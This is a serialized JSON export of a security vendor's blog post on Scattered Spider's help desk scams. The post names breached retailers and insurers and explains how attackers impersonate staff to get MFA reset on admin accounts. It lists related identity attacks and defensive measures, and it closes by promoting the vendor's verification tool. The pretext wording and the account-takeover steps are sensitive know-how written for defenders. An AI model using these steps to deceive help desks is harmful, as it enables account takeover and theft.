looming.",[],{},{"nodeType":178,"data":100759,"content":100760},{},[100761,100765,100774,100777,100786,100789,100798,100801,100810,100813,100822,100825,100834,100837,100846],{"nodeType":173,"value":100762,"marks":100763,"data":100764},"A series of attacks against retailers worldwide soon followed, at an unprecedented rate. ",[],{},{"nodeType":186,"data":100766,"content":100768},{"uri":100767},"https://www.bleepingcomputer.com/news/security/fashion-giant-dior-discloses-cyberattack-warns-of-data-breach/",[100769],{"nodeType":173,"value":100770,"marks":100771,"data":100773},"Dior",[100772],{"type":194},{},{"nodeType":173,"value":2936,"marks":100775,"data":100776},[],{},{"nodeType":186,"data":100778,"content":100780},{"uri":100779},"https://www.bleepingcomputer.com/news/security/the-north-face-warns-customers-of-april-credential-stuffing-attack/",[100781],{"nodeType":173,"value":100782,"marks":100783,"data":100785},"The North Face",[100784],{"type":194},{},{"nodeType":173,"value":2936,"marks":100787,"data":100788},[],{},{"nodeType":186,"data":100790,"content":100792},{"uri":100791},"https://www.bleepingcomputer.com/news/security/cartier-discloses-data-breach-amid-fashion-brand-cyberattacks/",[100793],{"nodeType":173,"value":100794,"marks":100795,"data":100797},"Cartier",[100796],{"type":194},{},{"nodeType":173,"value":2936,"marks":100799,"data":100800},[],{},{"nodeType":186,"data":100802,"content":100804},{"uri":100803},"https://www.bleepingcomputer.com/news/security/victorias-secret-delays-earnings-release-after-security-incident/",[100805],{"nodeType":173,"value":100806,"marks":100807,"data":100809},"Victoria’s Secret",[100808],{"type":194},{},{"nodeType":173,"value":2936,"marks":100811,"data":100812},[],{},{"nodeType":186,"data":100814,"content":100816},{"uri":100815},"https://www.bleepingcomputer.com/news/security/adidas-warns-of-data-breach-after-customer-service-provider-hack/",[100817],{"nodeType":173,"value":100818,"marks":100819,"data":100821},"Adidas",[100820],{"type":194},{},{"nodeType":173,"value":2936,"marks":100823,"data":100824},[],{},{"nodeType":186,"data":100826,"content":100828},{"uri":100827},"https://www.scworld.com/brief/separate-ransomware-attacks-purportedly-hit-coca-cola-bottling-partner",[100829],{"nodeType":173,"value":100830,"marks":100831,"data":100833},"Coca-Cola",[100832],{"type":194},{},{"nodeType":173,"value":9534,"marks":100835,"data":100836},[],{},{"nodeType":186,"data":100838,"content":100840},{"uri":100839},"https://www.bleepingcomputer.com/news/security/grocery-wholesale-giant-united-natural-foods-hit-by-cyberattack/",[100841],{"nodeType":173,"value":100842,"marks":100843,"data":100845},"United Natural Foods",[100844],{"type":194},{},{"nodeType":173,"value":100847,"marks":100848,"data":100849}," were among the retailers to suffer a breach between May-June 2025. ",[],{},{"nodeType":178,"data":100851,"content":100852},{},[100853,100857,100866,100869,100878,100882,100891,100895,100903,100906,100914,100917,100924],{"nodeType":173,"value":100854,"marks":100855,"data":100856},"The latest news links the hackers to attacks on ",[],{},{"nodeType":186,"data":100858,"content":100860},{"uri":100859},"https://www.bleepingcomputer.com/news/security/aflac-discloses-breach-amidst-scattered-spider-insurance-attacks/",[100861],{"nodeType":173,"value":100862,"marks":100863,"data":100865},"Aflac",[100864],{"type":194},{},{"nodeType":173,"value":2936,"marks":100867,"data":100868},[],{},{"nodeType":186,"data":100870,"content":100872},{"uri":100871},"https://www.bleepingcomputer.com/news/security/google-warns-scattered-spider-hackers-now-target-us-insurance-companies/",[100873],{"nodeType":173,"value":100874,"marks":100875,"data":100877},"Philadelphia Insurance Companies",[100876],{"type":194},{},{"nodeType":173,"value":100879,"marks":100880,"data":100881},",  ",[],{},{"nodeType":186,"data":100883,"content":100885},{"uri":100884},"https://www.bleepingcomputer.com/news/security/erie-insurance-confirms-cyberattack-behind-business-disruptions/amp/",[100886],{"nodeType":173,"value":100887,"marks":100888,"data":100890},"Erie Insurance",[100889],{"type":194},{},{"nodeType":173,"value":100892,"marks":100893,"data":100894},", and most recently ",[],{},{"nodeType":186,"data":100896,"content":100898},{"uri":100897},"https://www.bleepingcomputer.com/news/security/qantas-is-being-extorted-in-recent-data-theft-cyberattack/",[100899],{"nodeType":173,"value":100900,"marks":100901,"data":100902},"Qantas",[],{},{"nodeType":173,"value":2936,"marks":100904,"data":100905},[],{},{"nodeType":186,"data":100907,"content":100909},{"uri":100908},"https://www.bleepingcomputer.com/news/security/scattered-spider-hackers-shift-focus-to-aviation-transportation-firms/",[100910],{"nodeType":173,"value":100911,"marks":100912,"data":100913},"Hawaiian Airlines",[],{},{"nodeType":173,"value":933,"marks":100915,"data":100916},[],{},{"nodeType":186,"data":100918,"content":100919},{"uri":100908},[100920],{"nodeType":173,"value":100921,"marks":100922,"data":100923},"WestJet",[],{},{"nodeType":173,"value":2340,"marks":100925,"data":100926},[],{},{"nodeType":178,"data":100928,"content":100929},{},[100930],{"nodeType":173,"value":100931,"marks":100932,"data":100933},"The top story from recent campaigns is the use of help desk scams. This typically involves the attacker calling up a company’s help desk with some level of information — at minimum, PII that allows them to impersonate their victim, and sometimes a password, leaning heavily on their native English-speaking abilities to trick the help desk operator into giving them access to a user account. ",[],{},{"nodeType":231,"data":100935,"content":100936},{},[],{"nodeType":169,"data":100938,"content":100939},{},[100940],{"nodeType":173,"value":100941,"marks":100942,"data":100943},"Help desk scams 101",[],{},{"nodeType":178,"data":100945,"content":100946},{},[100947],{"nodeType":173,"value":100948,"marks":100949,"data":100950},"The goal of a help desk scam is to get the help desk operator to reset the credentials and/or MFA used to access an account so the attacker can take control of it. They’ll use a variety of backstories and tactics to get that done, but most of the time it’s as simple as saying “I’ve got a new phone, can you remove my existing MFA and allow me to enroll a new one?”",[],{},{"nodeType":178,"data":100952,"content":100953},{},[100954],{"nodeType":173,"value":100955,"marks":100956,"data":100957},"From there, the attacker is then sent an MFA reset link via email or SMS. Usually, this would be sent to, for example, a number on file — but at this point, the attacker has already established trust and bypassed the help desk process to a degree. So asking “can you send it to this email address” or “I’ve actually got a new number too, can you send it to…” gets this sent directly to the attacker. ",[],{},{"nodeType":178,"data":100959,"content":100960},{},[100961,100965,100970],{"nodeType":173,"value":100962,"marks":100963,"data":100964},"At this point, it’s simply a case of using the self service password reset functionality for Okta or Entra (which you can get around because you now have the MFA factor to verify yourself) and ",[],{},{"nodeType":173,"value":100966,"marks":100967,"data":100969},"voila",[100968],{"type":1646},{},{"nodeType":173,"value":100971,"marks":100972,"data":100973},", the attacker has taken control of the account. ",[],{},{"nodeType":178,"data":100975,"content":100976},{},[100977],{"nodeType":173,"value":100978,"marks":100979,"data":100980},"And the best part? Most help desks have the same process for every account — it doesn’t matter who you’re impersonating or which account you’re trying to reset. So, attackers are specifically targeting accounts likely to have top tier admin privileges — meaning once they get in, progressing the attack is trivial and much of the typical privilege escalation and lateral movement is removed from the attack path. ",[],{},{"nodeType":178,"data":100982,"content":100983},{},[100984],{"nodeType":173,"value":100985,"marks":100986,"data":100987},"So, help desk scams have proved to be a reliable way of bypassing MFA and achieving account takeover — the foothold from which to launch the rest of an attack, such as stealing data, deploying ransomware, etc. ",[],{},{"nodeType":231,"data":100989,"content":100990},{},[],{"nodeType":169,"data":100992,"content":100993},{},[100994],{"nodeType":173,"value":100995,"marks":100996,"data":100997},"Avoiding help desk gotchas",[],{},{"nodeType":178,"data":100999,"content":101000},{},[101001],{"nodeType":173,"value":101002,"marks":101003,"data":101004},"There’s lots of advice for securing help desks being circulated, but much of the advice still results in a process that is either phishable or difficult to implement. ",[],{},{"nodeType":178,"data":101006,"content":101007},{},[101008],{"nodeType":173,"value":101009,"marks":101010,"data":101011},"Ultimately, organizations need to be prepared to introduce friction to their help desk process and either delay or deny requests in situations where there’s significant risk. So, for example, having a process for MFA reset that recognizes the risk associated with resetting a high-privileged account:",[],{},{"nodeType":250,"data":101013,"content":101014},{},[101015,101025,101035],{"nodeType":254,"data":101016,"content":101017},{},[101018],{"nodeType":178,"data":101019,"content":101020},{},[101021],{"nodeType":173,"value":101022,"marks":101023,"data":101024},"Require multi-party approval / escalation for admin-level account resets",[],{},{"nodeType":254,"data":101026,"content":101027},{},[101028],{"nodeType":178,"data":101029,"content":101030},{},[101031],{"nodeType":173,"value":101032,"marks":101033,"data":101034},"Require in-person verification if the process can’t be followed remotely",[],{},{"nodeType":254,"data":101036,"content":101037},{},[101038],{"nodeType":178,"data":101039,"content":101040},{},[101041],{"nodeType":173,"value":101042,"marks":101043,"data":101044},"Freeze self-service resets when suspicious behavior is encountered (this would require some kind of internal process and awareness training to raise the alarm if an attack is suspected)",[],{},{"nodeType":178,"data":101046,"content":101047},{},[101048],{"nodeType":173,"value":101049,"marks":101050,"data":101051},"And watch out for these gotchas: ",[],{},{"nodeType":250,"data":101053,"content":101054},{},[101055,101065],{"nodeType":254,"data":101056,"content":101057},{},[101058],{"nodeType":178,"data":101059,"content":101060},{},[101061],{"nodeType":173,"value":101062,"marks":101063,"data":101064},"If you receive a call, good practice is to terminate the call and dial the number on file for the employee. But, in a world of SIM swapping, this isn’t a foolproof solution — you could just be re-dialing the attacker. ",[],{},{"nodeType":254,"data":101066,"content":101067},{},[101068],{"nodeType":178,"data":101069,"content":101070},{},[101071],{"nodeType":173,"value":101072,"marks":101073,"data":101074},"If your solution is to get the employee on camera, increasingly sophisticated deepfakes can thwart this approach.  ",[],{},{"nodeType":178,"data":101076,"content":101077},{},[101078],{"nodeType":173,"value":101079,"marks":101080,"data":101081},"But, help desks are a target for a reason. They’re “helpful” by nature. This is usually reflected in how they’re operated and performance measured — delays won’t help you to hit those SLAs! Ultimately, a process only works if employees are willing to adhere to it — and can’t be socially engineered to break it. Help desks that are removed from day-to-day operations (especially when outsourced or offshored) are also inherently susceptible to attacks where employees are impersonated. ",[],{},{"nodeType":231,"data":101083,"content":101084},{},[],{"nodeType":169,"data":101086,"content":101087},{},[101088],{"nodeType":173,"value":101089,"marks":101090,"data":101091},"Comparing help desk scams with other approaches",[],{},{"nodeType":178,"data":101093,"content":101094},{},[101095],{"nodeType":173,"value":101096,"marks":101097,"data":101098},"Taking a step back, it’s worth thinking about how help desk scams fit into the wider toolkit of tactics, techniques and procedures (TTPs) used by threat actors like Scattered Spider. ",[],{},{"nodeType":178,"data":101100,"content":101101},{},[101102,101105,101113],{"nodeType":173,"value":37,"marks":101103,"data":101104},[],{},{"nodeType":186,"data":101106,"content":101107},{"uri":63182},[101108],{"nodeType":173,"value":101109,"marks":101110,"data":101112},"Scattered Spider has heavily relied on identity-based TTPs since they first emerged in 2022",[101111],{"type":194},{},{"nodeType":173,"value":101114,"marks":101115,"data":101116},", following a repeatable path of bypassing MFA, achieving account takeover on privileged accounts, stealing data from cloud services, and deploying ransomware (principally to VMware environments). ",[],{},{"nodeType":250,"data":101118,"content":101119},{},[101120,101130,101140,101160,101170,101180],{"nodeType":254,"data":101121,"content":101122},{},[101123],{"nodeType":178,"data":101124,"content":101125},{},[101126],{"nodeType":173,"value":101127,"marks":101128,"data":101129},"Credential phishing via email and SMS (smishing) to harvest passwords en masse",[],{},{"nodeType":254,"data":101131,"content":101132},{},[101133],{"nodeType":178,"data":101134,"content":101135},{},[101136],{"nodeType":173,"value":101137,"marks":101138,"data":101139},"Using SIM swapping (where you get the carrier to transfer a number to your attacker-controlled SIM card) to bypass SMS-based MFA",[],{},{"nodeType":254,"data":101141,"content":101142},{},[101143],{"nodeType":178,"data":101144,"content":101145},{},[101146,101149,101156],{"nodeType":173,"value":59119,"marks":101147,"data":101148},[],{},{"nodeType":186,"data":101150,"content":101151},{"uri":775},[101152],{"nodeType":173,"value":778,"marks":101153,"data":101155},[101154],{"type":194},{},{"nodeType":173,"value":101157,"marks":101158,"data":101159}," (aka. push bombing) to bypass app-based push authentication",[],{},{"nodeType":254,"data":101161,"content":101162},{},[101163],{"nodeType":178,"data":101164,"content":101165},{},[101166],{"nodeType":173,"value":101167,"marks":101168,"data":101169},"Using vishing (i.e. directly calling a victim to social engineer their MFA code, as opposed to a help desk attack)",[],{},{"nodeType":254,"data":101171,"content":101172},{},[101173],{"nodeType":178,"data":101174,"content":101175},{},[101176],{"nodeType":173,"value":101177,"marks":101178,"data":101179},"Social engineering domain registrars to take control of the target organization’s DNS, hijacking their MX records and inbound mail, and using this to take over the company’s business app environments ",[],{},{"nodeType":254,"data":101181,"content":101182},{},[101183],{"nodeType":178,"data":101184,"content":101185},{},[101186,101190,101198],{"nodeType":173,"value":101187,"marks":101188,"data":101189},"And latterly, using ",[],{},{"nodeType":186,"data":101191,"content":101192},{"uri":49844},[101193],{"nodeType":173,"value":101194,"marks":101195,"data":101197},"MFA-bypass AiTM phishing kits like Evilginx",[101196],{"type":194},{},{"nodeType":173,"value":101199,"marks":101200,"data":101201}," to steal live user sessions, bypassing all common forms of MFA (with the exception of WebAuthn/FIDO2) ",[],{},{"nodeType":178,"data":101203,"content":101204},{},[101205],{"nodeType":173,"value":101206,"marks":101207,"data":101208},"So, help desk scams are an important part of their toolkit, but it’s not the whole picture. Methods like AiTM in particular have spiked in popularity this year as a reliable and scalable way of bypassing MFA and achieving account takeover, with attackers using these toolkits as the de facto standard, getting creative in their detection evasion methods and in some cases, evading standard delivery vectors like email altogether to ensure the success of their phishing campaigns. ",[],{},{"nodeType":312,"data":101210,"content":101213},{"target":101211},{"sys":101212},{"id":88007,"type":317,"linkType":318},[],{"nodeType":231,"data":101215,"content":101216},{},[],{"nodeType":169,"data":101218,"content":101219},{},[101220],{"nodeType":173,"value":101221,"marks":101222,"data":101223},"Stop identity attacks with Push Security",[],{},{"nodeType":178,"data":101225,"content":101226},{},[101227],{"nodeType":173,"value":101228,"marks":101229,"data":101230},"Modern attacks no longer take place on the endpoint or network — they target identities created and used via the web browser. This means that attacks increasingly take place in the browser (or rather, on resources your employees access through the browser). ",[],{},{"nodeType":178,"data":101232,"content":101233},{},[101234],{"nodeType":173,"value":101235,"marks":101236,"data":101237},"Push Security’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use, like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",[],{},{"nodeType":312,"data":101239,"content":101243},{"target":101240},{"sys":101241},{"id":101242,"type":317,"linkType":318},"4atESpAAPAC0zP8CO4m8oa",[],{"nodeType":178,"data":101245,"content":101246},{},[101247,101251,101260],{"nodeType":173,"value":101248,"marks":101249,"data":101250},"To help combat help desk scams, we recently released ",[],{},{"nodeType":186,"data":101252,"content":101253},{"uri":9152},[101254],{"nodeType":173,"value":101255,"marks":101256,"data":101259},"Employee Identity Verification Codes",[101257,101258],{"type":194},{"type":370},{},{"nodeType":173,"value":101261,"marks":101262,"data":101263}," — a simple, browser-based identity check that gives your help desk a reliable way to confirm they’re talking to someone from your organization.",[],{},{"nodeType":312,"data":101265,"content":101268},{"target":101266},{"sys":101267},{"id":9179,"type":317,"linkType":318},[],{"nodeType":178,"data":101270,"content":101271},{},[101272],{"nodeType":173,"value":101273,"marks":101274,"data":101275},"It enables legitimate help desk callers to quickly verify that they’re in possession of their primary device (i.e. laptop) by relaying a rotating 6-digit verification code in their browser via the Push extension. This is a great way to securely confirm caller identity and sniff out fraudulent callers, and can be used as part of a phishing-resistant help desk process. ",[],{},{"nodeType":231,"data":101277,"content":101278},{},[],{"nodeType":169,"data":101280,"content":101281},{},[101282],{"nodeType":173,"value":88147,"marks":101283,"data":101284},[],{},{"nodeType":178,"data":101286,"content":101287},{},[101288,101292,101301],{"nodeType":173,"value":101289,"marks":101290,"data":101291},"You can use Employee Verification Codes as a free tool by installing the Push browser extension. Simply ",[],{},{"nodeType":186,"data":101293,"content":101295},{"uri":101294},"https://pushsecurity.com/free-tool/employee-verification-codes",[101296],{"nodeType":173,"value":101297,"marks":101298,"data":101300},"sign up for a trial account and you can deploy the extension organization-wide to make use of this feature",[101299],{"type":194},{},{"nodeType":173,"value":101302,"marks":101303,"data":101304},". While you’re at it, you can trial Push’s full features for up to 10 users for free. ",[],{},{"nodeType":178,"data":101306,"content":101307},{},[101308,101312,101319],{"nodeType":173,"value":101309,"marks":101310,"data":101311},"Or if you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",[],{},{"nodeType":186,"data":101313,"content":101314},{"uri":473},[101315],{"nodeType":173,"value":1472,"marks":101316,"data":101318},[101317],{"type":194},{},{"nodeType":173,"value":1477,"marks":101320,"data":101321},[],{},{"nodeType":312,"data":101323,"content":101327},{"target":101324},{"sys":101325},{"id":101326,"type":317,"linkType":318},"6Td0hDBYdeT8tlnnfwipmD",[],{"nodeType":178,"data":101329,"content":101330},{},[101331],{"nodeType":173,"value":37,"marks":101332,"data":101333},[],{},"Scattered Spider: Understanding help desk scams and how to defend your organization","Scattered Spider has dominated the headlines in recent months with a consistent focus on help desk scams. Here's what you need to know to protect your business.","2025-06-27T00:00:00.000Z","scattered-spider-defending-against-help-desk-scams",{"items":101339},[101340,101342],{"sys":101341,"name":505},{"id":504},{"sys":101343,"name":509},{"id":508},{"items":101345},[101346],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":101347},{"url":1496},{"__typename":1528,"sys":101349,"content":101350,"title":46338,"synopsis":88214,"hashTags":118,"publishedDate":88215,"slug":46339,"tagsCollection":101645,"authorsCollection":101649},{"id":25128},{"json":101351},{"nodeType":165,"data":101352,"content":101353},{},[101354,101360,101366,101372,101377,101383,101413,101419,101425,101431,101436,101442,101448,101463,101468,101474,101490,101506,101512,101518,101524,101530,101536,101542,101548,101564,101570,101576,101581,101587,101593,101613,101618,101634,101639],{"nodeType":178,"data":101355,"content":101356},{},[101357],{"nodeType":173,"value":87881,"marks":101358,"data":101359},[],{},{"nodeType":178,"data":101361,"content":101362},{},[101363],{"nodeType":173,"value":87888,"marks":101364,"data":101365},[],{},{"nodeType":178,"data":101367,"content":101368},{},[101369],{"nodeType":173,"value":87895,"marks":101370,"data":101371},[],{},{"nodeType":312,"data":101373,"content":101376},{"target":101374},{"sys":101375},{"id":87902,"type":317,"linkType":318},[],{"nodeType":178,"data":101378,"content":101379},{},[101380],{"nodeType":173,"value":87908,"marks":101381,"data":101382},[],{},{"nodeType":250,"data":101384,"content":101385},{},[101386,101395,101404],{"nodeType":254,"data":101387,"content":101388},{},[101389],{"nodeType":178,"data":101390,"content":101391},{},[101392],{"nodeType":173,"value":87921,"marks":101393,"data":101394},[],{},{"nodeType":254,"data":101396,"content":101397},{},[101398],{"nodeType":178,"data":101399,"content":101400},{},[101401],{"nodeType":173,"value":87931,"marks":101402,"data":101403},[],{},{"nodeType":254,"data":101405,"content":101406},{},[101407],{"nodeType":178,"data":101408,"content":101409},{},[101410],{"nodeType":173,"value":87941,"marks":101411,"data":101412},[],{},{"nodeType":178,"data":101414,"content":101415},{},[101416],{"nodeType":173,"value":87948,"marks":101417,"data":101418},[],{},{"nodeType":169,"data":101420,"content":101421},{},[101422],{"nodeType":173,"value":87955,"marks":101423,"data":101424},[],{},{"nodeType":178,"data":101426,"content":101427},{},[101428],{"nodeType":173,"value":87962,"marks":101429,"data":101430},[],{},{"nodeType":312,"data":101432,"content":101435},{"target":101433},{"sys":101434},{"id":87969,"type":317,"linkType":318},[],{"nodeType":178,"data":101437,"content":101438},{},[101439],{"nodeType":173,"value":87975,"marks":101440,"data":101441},[],{},{"nodeType":169,"data":101443,"content":101444},{},[101445],{"nodeType":173,"value":87982,"marks":101446,"data":101447},[],{},{"nodeType":178,"data":101449,"content":101450},{},[101451,101454,101460],{"nodeType":173,"value":87989,"marks":101452,"data":101453},[],{},{"nodeType":186,"data":101455,"content":101456},{"uri":63182},[101457],{"nodeType":173,"value":87996,"marks":101458,"data":101459},[],{},{"nodeType":173,"value":88000,"marks":101461,"data":101462},[],{},{"nodeType":312,"data":101464,"content":101467},{"target":101465},{"sys":101466},{"id":88007,"type":317,"linkType":318},[],{"nodeType":235,"data":101469,"content":101470},{},[101471],{"nodeType":173,"value":88013,"marks":101472,"data":101473},[],{},{"nodeType":178,"data":101475,"content":101476},{},[101477,101480,101487],{"nodeType":173,"value":88020,"marks":101478,"data":101479},[],{},{"nodeType":186,"data":101481,"content":101482},{"uri":88025},[101483],{"nodeType":173,"value":88028,"marks":101484,"data":101486},[101485],{"type":194},{},{"nodeType":173,"value":88033,"marks":101488,"data":101489},[],{},{"nodeType":178,"data":101491,"content":101492},{},[101493,101496,101503],{"nodeType":173,"value":88040,"marks":101494,"data":101495},[],{},{"nodeType":186,"data":101497,"content":101498},{"uri":989},[101499],{"nodeType":173,"value":992,"marks":101500,"data":101502},[101501],{"type":194},{},{"nodeType":173,"value":88051,"marks":101504,"data":101505},[],{},{"nodeType":178,"data":101507,"content":101508},{},[101509],{"nodeType":173,"value":88058,"marks":101510,"data":101511},[],{},{"nodeType":178,"data":101513,"content":101514},{},[101515],{"nodeType":173,"value":88065,"marks":101516,"data":101517},[],{},{"nodeType":235,"data":101519,"content":101520},{},[101521],{"nodeType":173,"value":88072,"marks":101522,"data":101523},[],{},{"nodeType":178,"data":101525,"content":101526},{},[101527],{"nodeType":173,"value":88079,"marks":101528,"data":101529},[],{},{"nodeType":178,"data":101531,"content":101532},{},[101533],{"nodeType":173,"value":88086,"marks":101534,"data":101535},[],{},{"nodeType":169,"data":101537,"content":101538},{},[101539],{"nodeType":173,"value":88093,"marks":101540,"data":101541},[],{},{"nodeType":178,"data":101543,"content":101544},{},[101545],{"nodeType":173,"value":88100,"marks":101546,"data":101547},[],{},{"nodeType":178,"data":101549,"content":101550},{},[101551,101554,101561],{"nodeType":173,"value":88107,"marks":101552,"data":101553},[],{},{"nodeType":186,"data":101555,"content":101556},{"uri":88112},[101557],{"nodeType":173,"value":88115,"marks":101558,"data":101560},[101559],{"type":194},{},{"nodeType":173,"value":88120,"marks":101562,"data":101563},[],{},{"nodeType":178,"data":101565,"content":101566},{},[101567],{"nodeType":173,"value":88127,"marks":101568,"data":101569},[],{},{"nodeType":178,"data":101571,"content":101572},{},[101573],{"nodeType":173,"value":88134,"marks":101574,"data":101575},[],{},{"nodeType":312,"data":101577,"content":101580},{"target":101578},{"sys":101579},{"id":88141,"type":317,"linkType":318},[],{"nodeType":169,"data":101582,"content":101583},{},[101584],{"nodeType":173,"value":88147,"marks":101585,"data":101586},[],{},{"nodeType":178,"data":101588,"content":101589},{},[101590],{"nodeType":173,"value":88154,"marks":101591,"data":101592},[],{},{"nodeType":178,"data":101594,"content":101595},{},[101596,101599,101603,101606,101610],{"nodeType":173,"value":65787,"marks":101597,"data":101598},[],{},{"nodeType":173,"value":2789,"marks":101600,"data":101602},[101601],{"type":370},{},{"nodeType":173,"value":65795,"marks":101604,"data":101605},[],{},{"nodeType":173,"value":65800,"marks":101607,"data":101609},[101608],{"type":370},{},{"nodeType":173,"value":65804,"marks":101611,"data":101612},[],{},{"nodeType":312,"data":101614,"content":101617},{"target":101615},{"sys":101616},{"id":88181,"type":317,"linkType":318},[],{"nodeType":178,"data":101619,"content":101620},{},[101621,101624,101631],{"nodeType":173,"value":88187,"marks":101622,"data":101623},[],{},{"nodeType":186,"data":101625,"content":101626},{"uri":473},[101627],{"nodeType":173,"value":88194,"marks":101628,"data":101630},[101629],{"type":194},{},{"nodeType":173,"value":88199,"marks":101632,"data":101633},[],{},{"nodeType":312,"data":101635,"content":101638},{"target":101636},{"sys":101637},{"id":88206,"type":317,"linkType":318},[],{"nodeType":178,"data":101640,"content":101641},{},[101642],{"nodeType":173,"value":37,"marks":101643,"data":101644},[],{},{"items":101646},[101647],{"sys":101648,"name":26137},{"id":26136},{"items":101650},[101651],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":101652},{"url":516},{"__typename":1528,"sys":101654,"content":101655,"title":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":102196,"authorsCollection":102202},{"id":92907},{"json":101656},{"nodeType":165,"data":101657,"content":101658},{},[101659,101665,101671,101678,101701,101707,101712,101715,101722,101728,101734,101773,101779,101785,101788,101795,101801,101807,101813,101829,101835,101840,101847,101853,101859,101865,101870,101873,101880,101887,101893,101900,101906,101964,101970,101977,101983,102013,102020,102026,102033,102039,102046,102052,102100,102106,102109,102116,102122,102137,102167,102185,102190],{"nodeType":178,"data":101660,"content":101661},{},[101662],{"nodeType":173,"value":92916,"marks":101663,"data":101664},[],{},{"nodeType":178,"data":101666,"content":101667},{},[101668],{"nodeType":173,"value":92923,"marks":101669,"data":101670},[],{},{"nodeType":178,"data":101672,"content":101673},{},[101674],{"nodeType":173,"value":92930,"marks":101675,"data":101677},[101676],{"type":370},{},{"nodeType":178,"data":101679,"content":101680},{},[101681,101684,101691,101694,101698],{"nodeType":173,"value":92938,"marks":101682,"data":101683},[],{},{"nodeType":186,"data":101685,"content":101686},{"uri":92943},[101687],{"nodeType":173,"value":92946,"marks":101688,"data":101690},[101689],{"type":194},{},{"nodeType":173,"value":92951,"marks":101692,"data":101693},[],{},{"nodeType":173,"value":92955,"marks":101695,"data":101697},[101696],{"type":1646},{},{"nodeType":173,"value":92960,"marks":101699,"data":101700},[],{},{"nodeType":178,"data":101702,"content":101703},{},[101704],{"nodeType":173,"value":92967,"marks":101705,"data":101706},[],{},{"nodeType":312,"data":101708,"content":101711},{"target":101709},{"sys":101710},{"id":92974,"type":317,"linkType":318},[],{"nodeType":231,"data":101713,"content":101714},{},[],{"nodeType":169,"data":101716,"content":101717},{},[101718],{"nodeType":173,"value":92983,"marks":101719,"data":101721},[101720],{"type":370},{},{"nodeType":178,"data":101723,"content":101724},{},[101725],{"nodeType":173,"value":92991,"marks":101726,"data":101727},[],{},{"nodeType":178,"data":101729,"content":101730},{},[101731],{"nodeType":173,"value":92998,"marks":101732,"data":101733},[],{},{"nodeType":250,"data":101735,"content":101736},{},[101737,101746,101755,101764],{"nodeType":254,"data":101738,"content":101739},{},[101740],{"nodeType":178,"data":101741,"content":101742},{},[101743],{"nodeType":173,"value":93011,"marks":101744,"data":101745},[],{},{"nodeType":254,"data":101747,"content":101748},{},[101749],{"nodeType":178,"data":101750,"content":101751},{},[101752],{"nodeType":173,"value":93021,"marks":101753,"data":101754},[],{},{"nodeType":254,"data":101756,"content":101757},{},[101758],{"nodeType":178,"data":101759,"content":101760},{},[101761],{"nodeType":173,"value":93031,"marks":101762,"data":101763},[],{},{"nodeType":254,"data":101765,"content":101766},{},[101767],{"nodeType":178,"data":101768,"content":101769},{},[101770],{"nodeType":173,"value":93041,"marks":101771,"data":101772},[],{},{"nodeType":178,"data":101774,"content":101775},{},[101776],{"nodeType":173,"value":93048,"marks":101777,"data":101778},[],{},{"nodeType":178,"data":101780,"content":101781},{},[101782],{"nodeType":173,"value":93055,"marks":101783,"data":101784},[],{},{"nodeType":231,"data":101786,"content":101787},{},[],{"nodeType":169,"data":101789,"content":101790},{},[101791],{"nodeType":173,"value":93065,"marks":101792,"data":101794},[101793],{"type":370},{},{"nodeType":178,"data":101796,"content":101797},{},[101798],{"nodeType":173,"value":93073,"marks":101799,"data":101800},[],{},{"nodeType":178,"data":101802,"content":101803},{},[101804],{"nodeType":173,"value":93080,"marks":101805,"data":101806},[],{},{"nodeType":178,"data":101808,"content":101809},{},[101810],{"nodeType":173,"value":93087,"marks":101811,"data":101812},[],{},{"nodeType":178,"data":101814,"content":101815},{},[101816,101819,101826],{"nodeType":173,"value":93094,"marks":101817,"data":101818},[],{},{"nodeType":186,"data":101820,"content":101821},{"uri":27726},[101822],{"nodeType":173,"value":27729,"marks":101823,"data":101825},[101824],{"type":194},{},{"nodeType":173,"value":93105,"marks":101827,"data":101828},[],{},{"nodeType":178,"data":101830,"content":101831},{},[101832],{"nodeType":173,"value":93112,"marks":101833,"data":101834},[],{},{"nodeType":312,"data":101836,"content":101839},{"target":101837},{"sys":101838},{"id":93119,"type":317,"linkType":318},[],{"nodeType":169,"data":101841,"content":101842},{},[101843],{"nodeType":173,"value":93125,"marks":101844,"data":101846},[101845],{"type":370},{},{"nodeType":178,"data":101848,"content":101849},{},[101850],{"nodeType":173,"value":93133,"marks":101851,"data":101852},[],{},{"nodeType":178,"data":101854,"content":101855},{},[101856],{"nodeType":173,"value":93140,"marks":101857,"data":101858},[],{},{"nodeType":178,"data":101860,"content":101861},{},[101862],{"nodeType":173,"value":93147,"marks":101863,"data":101864},[],{},{"nodeType":312,"data":101866,"content":101869},{"target":101867},{"sys":101868},{"id":93154,"type":317,"linkType":318},[],{"nodeType":231,"data":101871,"content":101872},{},[],{"nodeType":169,"data":101874,"content":101875},{},[101876],{"nodeType":173,"value":93163,"marks":101877,"data":101879},[101878],{"type":370},{},{"nodeType":235,"data":101881,"content":101882},{},[101883],{"nodeType":173,"value":93171,"marks":101884,"data":101886},[101885],{"type":370},{},{"nodeType":178,"data":101888,"content":101889},{},[101890],{"nodeType":173,"value":93179,"marks":101891,"data":101892},[],{},{"nodeType":235,"data":101894,"content":101895},{},[101896],{"nodeType":173,"value":93186,"marks":101897,"data":101899},[101898],{"type":370},{},{"nodeType":178,"data":101901,"content":101902},{},[101903],{"nodeType":173,"value":93194,"marks":101904,"data":101905},[],{},{"nodeType":250,"data":101907,"content":101908},{},[101909,101918,101927,101946,101955],{"nodeType":254,"data":101910,"content":101911},{},[101912],{"nodeType":178,"data":101913,"content":101914},{},[101915],{"nodeType":173,"value":93207,"marks":101916,"data":101917},[],{},{"nodeType":254,"data":101919,"content":101920},{},[101921],{"nodeType":178,"data":101922,"content":101923},{},[101924],{"nodeType":173,"value":93217,"marks":101925,"data":101926},[],{},{"nodeType":254,"data":101928,"content":101929},{},[101930],{"nodeType":178,"data":101931,"content":101932},{},[101933,101936,101943],{"nodeType":173,"value":74365,"marks":101934,"data":101935},[],{},{"nodeType":186,"data":101937,"content":101938},{"uri":74370},[101939],{"nodeType":173,"value":74373,"marks":101940,"data":101942},[101941],{"type":194},{},{"nodeType":173,"value":37,"marks":101944,"data":101945}